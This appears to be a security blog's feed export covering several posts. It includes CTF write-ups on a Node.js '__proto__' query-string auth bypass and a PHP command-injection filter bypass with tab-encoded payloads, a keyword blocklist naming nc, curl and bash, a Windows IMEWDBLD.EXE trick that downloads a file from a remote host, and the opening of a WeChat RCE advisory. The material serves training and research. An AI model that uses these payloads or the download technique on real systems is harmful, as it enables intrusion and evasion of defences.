<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20210704132515104.png" alt="image-20210704132515104"></p>
<p><code>getflag3?%5f%5f%70%72%6f%74%6f%5f%5f=/login</code></p>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20210713205833461.png" alt="image-20210713205833461"></p>
<figure class="highlight gcode"><table><tr><td class="code"><pre><span class="line">https://xxx.xxx.xxx.xxx.com/getflag3?&%5b%5d/login </span><br><span class="line"><span class="comment"># the method used for getflag3 also works for getflag1 and getflag2</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20210704132912877.png" alt="image-20210704132912877"></p>
<h4 id="最后"><a href="#最后" class="headerlink" title="Closing"></a>Closing</h4><p>For reference only~</p>
]]></content>
</entry>
<entry>
<title>Notes from Another CTF Drill: Node.js</title>
<url>/2021/06/26/%E8%AE%B0%E5%8F%88%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-node/</url>
<content><![CDATA[<p>This article is for technical research and discussion only. Illegal use is strictly prohibited, and all consequences of such use are the user's own responsibility.</p>
<div style="text-align: right"> 小维</div>
<h4 id="前言"><a href="#前言" class="headerlink" title="Preface"></a>Preface</h4><p>This post records another CTF drill, this time a Node.js white-box code audit challenge...</p>
<h4 id="源码"><a href="#源码" class="headerlink" title="Source"></a>Source</h4><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="comment">// catch uncaught exceptions globally</span></span><br><span class="line">process.on(<span class="string">'uncaughtException'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">err</span>) </span>{</span><br><span class="line"> <span class="built_in">console</span>.log(<span class="string">'Caught exception: '</span>, err);</span><br><span class="line">}); </span><br><span class="line"></span><br><span class="line"><span class="comment">//// import modules</span></span><br><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>) </span><br><span class="line"><span class="keyword">var</span> session = <span class="built_in">require</span>(<span class="string">'express-session'</span>);</span><br><span class="line"><span class="keyword">var</span> fs = <span class="built_in">require</span>(<span class="string">'fs'</span>);</span><br><span class="line"><span class="keyword">var</span> path = <span class="built_in">require</span>(<span class="string">'path'</span>);</span><br><span class="line"><span class="keyword">var</span> config = <span class="built_in">require</span>(<span class="string">'./config'</span>);</span><br><span class="line"><span class="keyword">var</span> marked = <span class="built_in">require</span>(<span class="string">'marked'</span>);</span><br><span class="line"><span class="keyword">var</span> morgan = <span class="built_in">require</span>(<span class="string">'morgan'</span>);</span><br><span class="line"><span class="keyword">var</span> bodyParser = <span class="built_in">require</span>(<span class="string">'body-parser'</span>);</span><br><span class="line"><span class="keyword">var</span> AccessControl = <span class="built_in">require</span>(<span class="string">'express-ip-access-control'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> port = process.env.PORT;</span><br><span class="line"><span class="keyword">var</span> app = express()</span><br><span class="line"><span class="keyword">var</span> sourceCode;</span><br><span class="line"></span><br><span class="line">marked.setOptions({</span><br><span class="line"> highlight: <span class="function"><span class="keyword">function</span> (<span class="params">code</span>) </span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">require</span>(<span class="string">'highlight.js'</span>).highlightAuto(code).value</span><br><span class="line"> }</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="comment">// read this file from disk and render it as highlighted source</span></span><br><span class="line">fs.readFile(<span class="string">'app.js'</span>, <span class="string">'utf8'</span>, (err, data) => {</span><br><span class="line"> <span class="keyword">if</span> (!err) {</span><br><span class="line"> markdown = <span class="string">`\`\`\`node\n<span class="subst">${data}</span>\n\`\`\``</span>;</span><br><span class="line"> sourceCode = marked(markdown);</span><br><span class="line"> }</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> options = {</span><br><span class="line"> mode: <span class="string">'allow'</span>,</span><br><span class="line"> denys: [],</span><br><span class="line"> allows: [<span class="string">'10.0.0.6'</span>],</span><br><span class="line"> forceConnectionAddress: <span class="literal">false</span>,</span><br><span class="line"> log: <span class="function"><span class="keyword">function</span> (<span class="params">clientIp, access</span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (!access)</span><br><span class="line"> <span class="built_in">console</span>.log(<span class="string">`<span class="subst">${clientIp}</span> denied.`</span>);</span><br><span class="line"> },</span><br><span class="line"> statusCode: <span class="number">404</span>,</span><br><span class="line"> redirectTo: <span class="string">''</span>,</span><br><span class="line"> message: <span class="string">'404 Not Found...Don\'t fuck me Please......'</span></span><br><span class="line">};</span><br><span class="line"></span><br><span class="line"><span class="comment">// IP access control via 'express-ip-access-control'</span></span><br><span class="line">app.use(AccessControl(options));</span><br><span class="line"><span class="comment">// views directory for the application, templates use the ejs extension</span></span><br><span class="line">app.set(<span class="string">'views'</span>, path.join(__dirname, <span class="string">'views'</span>));</span><br><span class="line">app.set(<span class="string">'view engine'</span>, <span class="string">'ejs'</span>);</span><br><span class="line"><span class="comment">// everything under public/ is served as static files (styles, scripts, images, ...)</span></span><br><span class="line">app.use(express.static(path.join(__dirname, <span class="string">'public'</span>)));</span><br><span class="line"></span><br><span class="line"><span class="comment">//session</span></span><br><span class="line">app.use(session({ <span class="attr">secret</span>: <span class="string">'ctf'</span>, <span class="attr">resave</span>: <span class="literal">true</span>, <span class="attr">saveUninitialized</span>: <span class="literal">true</span>, <span class="attr">name</span>: <span class="string">'SID'</span> }));</span><br><span class="line"></span><br><span class="line"><span class="comment">// morgan log formatting, custom format named ctf</span></span><br><span class="line">morgan.format(<span class="string">'ctf'</span>, <span class="string">'[ctf] [:remote-addr/:req[x-forwarded-for]] - ":method :url HTTP/:http-version" :status :res[content-length] ":referrer" ":user-agent"'</span>);</span><br><span class="line">app.use(morgan(<span class="string">'ctf'</span>));</span><br><span class="line"></span><br><span class="line"><span class="comment">// body-parser middleware for application/x-www-form-urlencoded; extended: true selects the qs parser (nested objects and arrays), 100mb body limit, 1000000 parameter limit</span></span><br><span class="line">app.use(bodyParser.urlencoded({ <span class="attr">limit</span>: <span class="string">'100mb'</span>, <span class="attr">extended</span>: <span class="literal">true</span>, <span class="attr">parameterLimit</span>: <span class="number">1000000</span> }));</span><br><span class="line"></span><br><span class="line"><span class="comment">// site root</span></span><br><span class="line">app.get(<span class="string">'/'</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res</span>) </span>{</span><br><span class="line"> <span class="comment">// console.log(sourceCode);</span></span><br><span class="line"> res.render(<span class="string">'index'</span>, {<span class="attr">code</span>: sourceCode});</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="comment">// access-control middleware</span></span><br><span class="line">app.use(<span class="function"><span class="keyword">function</span> (<span class="params">req, res, next</span>) </span>{</span><br><span class="line"> <span class="comment">// redirect when the URL is protected (no /login in it) and session['username'] is not set</span></span><br><span class="line"> <span class="keyword">if</span> (isProtectUrl(req.originalUrl, req.query) && (<span class="keyword">typeof</span> req.session[<span class="string">'username'</span>] == <span class="string">'undefined'</span>)) {</span><br><span class="line"> res.redirect(<span class="string">'/'</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> next();</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// decides whether the URL is protected by looking for /login in it</span></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">isProtectUrl</span>(<span class="params">url, query_url</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> isProtectUrl = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> unProtectUrl = [];</span><br><span class="line"> unProtectUrl.push(<span class="string">'/login'</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < unProtectUrl.length; i++) {</span><br><span class="line"> <span class="keyword">if</span> (unProtectUrl[i] == url || (url.indexOf(<span class="string">'#'</span>) < <span class="number">0</span> && url.indexOf(unProtectUrl[i]) >= <span class="number">0</span> && <span class="built_in">JSON</span>.stringify(query_url).indexOf(unProtectUrl[i]) < <span class="number">0</span>)) {</span><br><span class="line"> isProtectUrl = <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> isProtectUrl</span><br><span class="line"> }</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="comment">// login page</span></span><br><span class="line">app.get(<span class="string">'/login'</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res</span>) </span>{</span><br><span class="line"> res.render(<span class="string">'login'</span>);</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="comment">// login POST handler</span></span><br><span class="line">app.post(<span class="string">'/login'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> username = req.body[<span class="string">'username'</span>];</span><br><span class="line"> <span class="keyword">var</span> password = req.body[<span class="string">'password'</span>];</span><br><span class="line"> <span class="keyword">if</span> (username == config.username && password == config.password) {</span><br><span class="line"> req.session[<span class="string">"username"</span>] = <span class="string">"admin"</span>;</span><br><span class="line"> res.send(<span class="string">"login success."</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> res.send(<span class="string">'login failed.'</span>);</span><br><span class="line"> } </span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="comment">// getflag page</span></span><br><span class="line">app.get(<span class="string">'/getflag'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>{</span><br><span class="line"> <span class="comment">// console.log(config);</span></span><br><span class="line"> res.render(<span class="string">'flag'</span>, {<span class="attr">flag</span>: config.flag}); <span class="comment">// render the flag</span></span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="comment">// listen</span></span><br><span class="line">app.listen(port, <span class="string">'0.0.0.0'</span>, () => {</span><br><span class="line"> <span class="built_in">console</span>.log(<span class="string">`ksctf app listening at http://0.0.0.0:<span class="subst">${port}</span>`</span>);</span><br><span class="line">})</span><br></pre></td></tr></table></figure>
<a id="more"></a>
<h4 id="思路解析"><a href="#思路解析" class="headerlink" title="Analysis"></a>Analysis</h4><p>First, read the code. It imports a few modules and defines the site root, which renders the application's own source. A middleware then calls isProtectUrl to decide whether the URL contains /login, and checks whether session['username'] is defined: a request whose URL is protected (no /login in it) <em>and</em> whose session has no username is redirected to the site root; otherwise the request continues. A login page is defined where a username and password can be POSTed, and the session is populated if they match. Finally a getflag page is defined that renders the flag.</p>
<p>The challenge is essentially to reach /getflag and read the flag.</p>
<h5 id="初步想法"><a href="#初步想法" class="headerlink" title="Initial idea"></a>Initial idea</h5><p>Either find some form of cookie forgery that populates the session and so gets past typeof req.session['username'] == 'undefined', or bypass isProtectUrl(req.originalUrl, req.query); making either of the two conditions fail is enough to reach /getflag.</p>
<h5 id="本题考点"><a href="#本题考点" class="headerlink" title="Key point"></a>Key point</h5><p><strong>Bypassing isProtectUrl(url, query_url);</strong></p>
<p>req.query is an object with one property for each query-string parameter of the route. The check compares the raw req.originalUrl against JSON.stringify(req.query), and the two disagree in several cases:</p>
<p>1. Keys that name prototype-chain properties are not retained (qs, the extended parser Express uses here, skips keys such as <code>__proto__</code>).</p>
<p>2. If there is no query string, or no parameter survives parsing, it is an empty object, <code>{}</code>.</p>
<p>3. Text between an array <code>[]</code> and the <code>=</code> is not retained (for example <code>[]123</code> does not yield 123).</p>
<p>…</p>
<h4 id="解题步骤"><a href="#解题步骤" class="headerlink" title="Solution"></a>Solution</h4><p>Using the properties above we can construct <code>getflag?__proto__=/login</code>, <code>getflag?=/login</code> and so on: <code>/login</code> is present in req.originalUrl, but the parser drops the parameter, so JSON.stringify(req.query) does not contain it and the check returns false.</p>
<h5 id="本地环境调试"><a href="#本地环境调试" class="headerlink" title="Local debugging"></a>Local debugging</h5><p>1. <code>getflag?=/login</code></p>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-node.js/image-20210626122959208.png" alt="image-20210626122959208"></p>
<p>2. <code>getflag?__proto__=/login</code></p>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-node.js/image-20210626122805010.png" alt="image-20210626122805010"></p>
<h5 id="CTF环境"><a href="#CTF环境" class="headerlink" title="CTF environment"></a>CTF environment</h5><p>Request /getflag to obtain the flag</p>
<figure class="highlight awk"><table><tr><td class="code"><pre><span class="line">https:<span class="regexp">//</span>xxx.xxx.com<span class="regexp">/getflag?__proto__=/</span>login</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-node.js/image-20210625214459295.png" alt="image-20210625214459295"></p>
<h4 id="最后"><a href="#最后" class="headerlink" title="Closing"></a>Closing</h4><p>For reference only~</p>
]]></content>
</entry>
<entry>
<title>WEB Batch Requester.md</title>
<url>/2021/06/17/web%E6%89%B9%E9%87%8F%E8%AF%B7%E6%B1%82%E5%99%A8/</url>
<content><![CDATA[<p>This tool is for technical research and testing only. Illegal use is strictly prohibited, and all consequences of such use are the user's own responsibility.</p>
<h4 id="介绍"><a href="#介绍" class="headerlink" title="Introduction"></a>Introduction</h4><p>WEB Batch Requester (WebBatchRequest) is a lightweight tool written in Java that runs fast liveness probing, title retrieval and simple banner identification against a batch of target addresses. It supports HTTP proxies and custom HTTP requests, which makes it usable for batch vulnerability verification.</p>
<a id="more"></a>
<h5 id="支持功能"><a href="#支持功能" class="headerlink" title="Features"></a>Features</h5><ul>
<li><input checked="" disabled="" type="checkbox"> Import and export of data</li>
<li><input checked="" disabled="" type="checkbox"> GET, POST and HEAD requests</li>
<li><input checked="" disabled="" type="checkbox"> HTTP proxy</li>
<li><input checked="" disabled="" type="checkbox"> Custom headers</li>
<li><input checked="" disabled="" type="checkbox"> Custom cookies</li>
<li><input checked="" disabled="" type="checkbox"> Custom User-Agent</li>
<li><input checked="" disabled="" type="checkbox"> Follow 302 redirects</li>
<li><input checked="" disabled="" type="checkbox"> Progress bar</li>
<li><input checked="" disabled="" type="checkbox"> Configurable thread count</li>
<li><input checked="" disabled="" type="checkbox"> Open results in the default browser</li>
<li><input checked="" disabled="" type="checkbox"> Sortable result list</li>
<li><input checked="" disabled="" type="checkbox"> Suggestions and feature requests can be raised in ISSUES</li>
</ul>
<h4 id="效果"><a href="#效果" class="headerlink" title="Screenshots"></a>Screenshots</h4><p><img src="/img/web%E6%89%B9%E9%87%8F%E8%AF%B7%E6%B1%82%E5%99%A8/image-20210613213901838.png" alt="image-20210613213901838"></p>
<p><img src="/img/web%E6%89%B9%E9%87%8F%E8%AF%B7%E6%B1%82%E5%99%A8/image-20210613213932554.png" alt="image-20210613213932554"></p>
<p><img src="/img/web%E6%89%B9%E9%87%8F%E8%AF%B7%E6%B1%82%E5%99%A8/image-20210613214104266.png" alt="image-20210613214104266"></p>
<h4 id="项目地址"><a href="#项目地址" class="headerlink" title="Project URL"></a>Project URL</h4><figure class="highlight awk"><table><tr><td class="code"><pre><span class="line">https://github.com/ScriptKid-Beta/WebBatchRequest</span><br></pre></td></tr></table></figure>
<h4 id="最后"><a href="#最后" class="headerlink" title="Closing"></a>Closing</h4><p>Stars are welcome. Most importantly, if you have suggestions or find bugs, please raise them in ISSUES~</p>
]]></content>
</entry>
<entry>
<title>Notes from a CTF Drill: Command Execution Bypass</title>
<url>/2021/05/20/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/</url>
<content><![CDATA[<p>This article is for technical research and discussion only. Illegal use is strictly prohibited, and all consequences of such use are the user's own responsibility.</p>
<div style="text-align: right"> 小维</div>
<h4 id="前言"><a href="#前言" class="headerlink" title="Preface"></a>Preface</h4><p>This post records a PHP white-box code audit challenge from a CTF drill...</p>
<h4 id="源码"><a href="#源码" class="headerlink" title="Source"></a>Source</h4><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>); <span class="comment">// syntax-highlight this file</span></span><br><span class="line">$filter = <span class="string">'/#|`| |[\x0a]|php|perl|dir|rm|ls|sleep|cut|sh|bash|grep|ash|nc|ping|curl|cat|tac|od|more|less|nl|vi|unique|head|tail|sort|rev|string|find|\$|\(\|\)|\[|\]|\{|\}|\>|\<|\?|\'|"|\*|;|\||&|\/|\\\\/is'</span>; <span class="comment"># define the blocklist</span></span><br><span class="line">$cmd = $_GET[<span class="string">'cmd'</span>]; <span class="comment"># data passed via GET</span></span><br><span class="line"><span class="keyword">if</span>(!preg_match($filter, $cmd)){ <span class="comment"># match the input against the blocklist</span></span><br><span class="line"> system($cmd.<span class="string">"echo 'okkkkkk'"</span>); <span class="comment"># run the external command and show its output</span></span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"ohhhhnnnoooooooooo....."</span>); <span class="comment"># print a message and exit the script</span></span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<a id="more"></a>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/image-20210519155907178.png" alt="image-20210519155907178"></p>
<h4 id="思路解析"><a href="#思路解析" class="headerlink" title="Analysis"></a>Analysis</h4><p>First, read the code. A <code>filter</code> is defined that blocks a number of shell commands and other keywords (most of the common commands and symbols are covered). A <code>$_GET</code> variable receives the data sent via GET, and it is matched against <code>filter</code>: if no blocked keyword is found, the GET data is concatenated with <code>echo 'okkkkkk'</code> and passed to <code>system()</code>; if something matches, <code>ohhhhnnnoooooooooo.....</code> is printed and the script exits. The whole challenge therefore comes down to bypassing <code>filter</code>. Note that the concatenation is done with no separator, so whatever ends the payload is glued directly onto <code>echo</code>.</p>
<h5 id="初步想法"><a href="#初步想法" class="headerlink" title="Initial idea"></a>Initial idea</h5><p>Use other Linux commands that can locate and display files, and use a suitable separator at the end of the payload so that the <code>echo 'okkkkkk'</code> appended afterwards does not corrupt the last argument.</p>
<h5 id="本题考点"><a href="#本题考点" class="headerlink" title="Key points"></a>Key points</h5><p>① Bypassing the space filter</p>
<p>② Other Linux commands that can list the files in a directory</p>
<p>③ Other Linux commands that can display a file's contents</p>
<h4 id="解题步骤"><a href="#解题步骤" class="headerlink" title="Solution"></a>Solution</h4><h5 id="方式一"><a href="#方式一" class="headerlink" title="Method one"></a>Method one</h5><figure class="highlight sqf"><table><tr><td class="code"><pre><span class="line">① Use du -a to find the name of the flag file</span><br><span class="line">② Use sed p to print the file</span><br><span class="line">Note: %09 (a tab) is used in place of spaces</span><br><span class="line"><span class="meta"># Linux du command reference: https:<span class="comment">//www.runoob.com/linux/linux-comm-du.html</span></span></span><br></pre></td></tr></table></figure>
<p>Testing the commands in a local environment</p>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/image-20210519175241095.png" alt="image-20210519175241095"></p>
<figure class="highlight apache"><table><tr><td class="code"><pre><span class="line"><span class="comment"># List the current directory; the flag file is named this_is_real_real_flag_other_is_fake</span></span><br><span class="line"><span class="attribute">https</span>://xxx.xxx.com/?cmd=du<span class="number">%09</span>-a<span class="number">%09</span>.<span class="number">%09</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/image-20210519175502328.png" alt="image-20210519175502328"></p>
<figure class="highlight apache"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Print the contents of this_is_real_real_flag_other_is_fake</span></span><br><span class="line"><span class="attribute">https</span>://xxx.xxx.com/?cmd=sed<span class="number">%09</span>p<span class="number">%09</span>this_is_real_real_flag_other_is_fake<span class="number">%09</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/image-20210519162007917.png" alt="image-20210519162007917"></p>
<h5 id="方式二"><a href="#方式二" class="headerlink" title="Method two"></a>Method two</h5><figure class="highlight sqf"><table><tr><td class="code"><pre><span class="line">① Use chgrp -v -R to find the name of the flag file</span><br><span class="line">② Use sed p to print the file</span><br><span class="line">Note: %09 (a tab) is used in place of spaces</span><br><span class="line"><span class="meta"># Linux chgrp command reference: https:<span class="comment">//www.runoob.com/linux/linux-comm-chgrp.html</span></span></span><br></pre></td></tr></table></figure>
<p>Testing the commands in a local environment</p>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/image-20210519175429396.png" alt="image-20210519175429396"></p>
<figure class="highlight apache"><table><tr><td class="code"><pre><span class="line"><span class="comment"># List the current directory (chgrp -v prints every file it touches); the flag file is named this_is_real_real_flag_other_is_fake</span></span><br><span class="line"><span class="attribute">https</span>://xxx.xxx.com/?cmd=chgrp<span class="number">%09</span>-v<span class="number">%09</span>-R<span class="number">%09</span>root<span class="number">%09</span>.<span class="number">%09</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/image-20210519161927450.png" alt="image-20210519161927450"></p><figure class="highlight apache"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Print the contents of this_is_real_real_flag_other_is_fake</span></span><br><span class="line"><span class="attribute">https</span>://xxx.xxx.com/?cmd=sed<span class="number">%09</span>p<span class="number">%09</span>this_is_real_real_flag_other_is_fake<span class="number">%09</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/image-20210519162007917.png" alt="image-20210519162007917"></p>
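<p>The example below is added here and is not code from the post. It ports the challenge's PHP blocklist regex to JavaScript so that candidate <code>?cmd=</code> values can be screened offline the way <code>preg_match()</code> would see them, builds the exact string the server hands to <code>system()</code>, and splits it on whitespace to show why every working payload above ends in <code>%09</code>. The whitespace split is a deliberately simplified model of shell word splitting (it does not strip the quotes around <code>okkkkkk</code>); the function names and the payload list are my own.</p>

```javascript
// Added example, not code from the post: the challenge's PHP blocklist
// re-expressed as a JavaScript regex so candidate payloads can be screened
// offline, plus the string the server would actually hand to system() and a
// rough whitespace split showing why each payload ends in %09.
const FILTER = /#|`| |\x0a|php|perl|dir|rm|ls|sleep|cut|sh|bash|grep|ash|nc|ping|curl|cat|tac|od|more|less|nl|vi|unique|head|tail|sort|rev|string|find|\$|\(\|\)|\[|\]|\{|\}|>|<|\?|'|"|\*|;|\||&|\/|\\/i;

// True when preg_match() would find nothing, i.e. the payload reaches system().
function passesFilter(cmd) {
  return !FILTER.test(cmd);
}

// What system() receives: the decoded GET value with the fixed suffix glued on.
function buildCommand(cmd) {
  return cmd + "echo 'okkkkkk'";
}

// Simplified model of shell word splitting (assumption): split on spaces and
// tabs only; quotes are left as-is, a real shell would strip them.
function argv(command) {
  return command.split(/[ \t]+/).filter(Boolean);
}

// Screens one URL-encoded ?cmd= value the way the PHP script would see it.
function evaluatePayload(encoded) {
  const cmd = decodeURIComponent(encoded);
  const allowed = passesFilter(cmd);
  return { cmd, allowed, argv: allowed ? argv(buildCommand(cmd)) : null };
}

// Constructed payloads: the ones from the post plus a few that the filter rejects.
const PAYLOADS = [
  'du%09-a%09.%09',                                    // method one, step 1
  'sed%09p%09this_is_real_real_flag_other_is_fake%09', // step 2
  'chgrp%09-v%09-R%09root%09.%09',                     // method two, step 1
  'du%09-a%09.',                                       // no trailing tab: last word becomes ".echo"
  'ls%20-la',                                          // space and "ls" are both blocked
  'cat%09flag',                                        // "cat" is blocked
  'du%0a-a%0a.',                                       // newline is blocked, tab is not
];

for (const p of PAYLOADS) {
  console.log(p, evaluatePayload(p));
}
```

<p>The trailing tab is what keeps <code>echo</code> a separate word: without it the final <code>.</code> and <code>echo</code> fuse into <code>.echo</code>, so <code>du</code> is asked for a path that does not exist. Any unlisted command name survives the filter, which is why <code>du</code>, <code>chgrp</code> and <code>sed</code> stand in for <code>ls</code>, <code>find</code> and <code>cat</code>.</p>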
<h4 id="参考"><a href="#参考" class="headerlink" title="References"></a>References</h4><p><a href="https://www.runoob.com/linux/linux-comm-du.html" target="_blank" rel="noopener">https://www.runoob.com/linux/linux-comm-du.html</a></p>
<p><a href="https://www.runoob.com/linux/linux-comm-chgrp.html" target="_blank" rel="noopener">https://www.runoob.com/linux/linux-comm-chgrp.html</a></p>
]]></content>
<tags>
<tag>CTF</tag>
</tags>
</entry>
<entry>
<title>Landray (蓝凌) OA Getshell 0day</title>
<url>/2021/04/25/%E8%93%9D%E5%87%8COA_0day/</url>
<content><![CDATA[<div id="hexo-blog-encrypt" data-wpm="Incorrect password, please try again!" data-whm="The article could not be verified, but you can still view the decrypted content!">
<div class="hbe-input-container">
<input type="password" id="hbePass" placeholder="" />
<label for="hbePass">This post is password-protected. Please enter the password to view it.</label>
<div class="bottom-line"></div>
</div>
<script id="hbeData" type="hbeData" data-hmacdigest="d889eb0e3a3aed84d1e784b361541533ea42839bbb3e72f2fe6dc8c0ff524e9e">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</script>
</div>
<script src="/lib/blog-encrypt.js"></script><link href="/css/blog-encrypt.css" rel="stylesheet" type="text/css">]]></content>
</entry>
<entry>
<title>Downloading Arbitrary Files with the Built-in Windows Program IMEWDBLD.EXE</title>
<url>/2021/04/20/%E9%80%9A%E8%BF%87Windows%E8%87%AA%E5%B8%A6%E7%A8%8B%E5%BA%8FIMEWDBLD.EXE%E4%B8%8B%E8%BD%BD%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6/</url>
<content><![CDATA[<p>This article is for technical research and discussion only. Illegal use is strictly prohibited, and all consequences of such use are the user's own responsibility.</p>
<div style="text-align: right"> 小维</div>
<figure class="highlight yaml"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Environment</span></span><br><span class="line"><span class="string">OS Name:</span> <span class="string">Microsoft Windows 10 Pro</span></span><br><span class="line"><span class="string">OS Version:</span> <span class="number">10.0.18363</span> <span class="string">N/A Build</span> <span class="number">18363</span></span><br></pre></td></tr></table></figure>
<a id="more"></a>
<figure class="highlight powershell"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Host the payload over HTTP (here a quick HTTP server started with python3)</span></span><br><span class="line">python3 <span class="literal">-m</span> http.server</span><br><span class="line"></span><br><span class="line"><span class="comment"># Download an arbitrary file with IMEWDBLD.EXE</span></span><br><span class="line">C:\Windows\System32\IME\SHARED\IMEWDBLD.EXE http://<span class="number">10.200</span>.<span class="number">73.104</span>/download.txt</span><br><span class="line"></span><br><span class="line"><span class="comment"># Find where the downloaded file was stored</span></span><br><span class="line">forfiles /P <span class="string">"%localappdata%\Microsoft\Windows\INetCache"</span> /S /M * /C <span class="string">"cmd /c echo @path"</span></span><br><span class="line"><span class="comment"># forfiles parameters</span></span><br><span class="line">/P  Path to start searching in. The default is the current working directory (.).</span><br><span class="line">/S  Recurse into subdirectories, like <span class="string">"DIR /S"</span>.</span><br><span class="line">/M  Search files by mask. The default mask is <span class="string">'*'</span>.</span><br><span class="line">/C  Command to execute for each file; the command string must be wrapped in double quotes.</span><br><span class="line">    @path returns the full path of the file.</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E9%80%9A%E8%BF%87Windows%E8%87%AA%E5%B8%A6%E7%A8%8B%E5%BA%8FIMEWDBLD.EXE%E4%B8%8B%E8%BD%BD%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6/image-20210420130233187.png" alt="image-20210420133444561"></p>
]]></content>
</entry>
<entry>
<title>Wechat RCE 0day</title>
<url>/2021/04/18/Wechat-RCE-0day/</url>
<content><![CDATA[<p>This article is for technical research and discussion only. Illegal use is strictly prohibited, and all consequences of such use are the user's own responsibility.</p>
<div style="text-align: right"> 小维</div>
<h4 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="Vulnerability description"></a>Vulnerability description</h4><p>This vulnerability is a derivative of a historical bug in the Google V8 engine. The WeChat client (Windows version) uses V8 to run JavaScript and does so with the sandbox turned off (the <code>--no-sandbox</code> flag). An attacker crafts a malicious phishing link and sends it over WeChat; once the victim opens it in the Windows WeChat client, the attacker gains control of the host, i.e. remote code execution.</p>
<h4 id="影响范围"><a href="#影响范围" class="headerlink" title="Affected versions"></a>Affected versions</h4><p>WeChat PC client (Windows) < 3.2.1.141 (note: in my own tests, some older versions did not appear to be affected)</p>
<a id="more"></a>
